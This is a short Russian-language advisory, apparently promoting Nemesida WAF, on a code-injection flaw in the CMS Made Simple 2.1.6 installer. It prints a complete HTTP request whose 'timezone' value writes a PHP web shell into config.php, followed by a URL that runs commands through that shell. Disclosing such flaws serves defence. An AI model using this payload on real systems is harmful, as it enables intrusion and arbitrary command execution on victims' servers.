В системе управления сайтами CMS Made Simple обнаружена уязвимость удаленного выполнения произвольного кода.

CMS Made Simple (сокращённо CMSMS) — система управления сайтом, при помощи которой можно создавать сайты, оформлять их дизайн и расширять функциональность. Система может быть расширена при помощи модулей и тегов и подходит как для управления небольшими сайтами, так и для настройки целых порталов.

Уязвимость содержится в инсталляционном скрипте и позволяет злоумышленнику внедрить произвольный код в скрипт config.php, формируемый на этапе установки веб-приложения. Уязвимым параметром является "timezone".

Пример запроса, приводящий к записи функционала веб-шелла в файл config.php:

POST /cms/cmsms-2.1.6-install.php/index.php?mdf68c24c=4 HTTP/1.1
Host: 192.168.5.196
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101
Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.196/cms/cmsms-2.1.6-install.php/index.
php?mdf68c24c=4
Cookie: CMSICc861538bbb=i549m59qpme0u9klupbkb68me4
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 126
 
dbhost=localhost&dbname=cms&dbuser=xvwa&dbpass=xvwa&
timezone=junk';echo%20system($_GET['cmd']);$junk='junk&next=Next+%E2%86%92

После внедрения пейлоада атакующий получит веб-шелл на атакованной системе:

http://target/path/config.php?cmd=id;uname

Такие атаки блокируются с помощью сигнатурного анализа. В случае обфускации пейлоада, запрос обрабатывается модулем искусственного интеллекта Nemesida WAF, распознающего аномалию в параметре запроса и позволяющему выявить эксплуатацию уязвимости.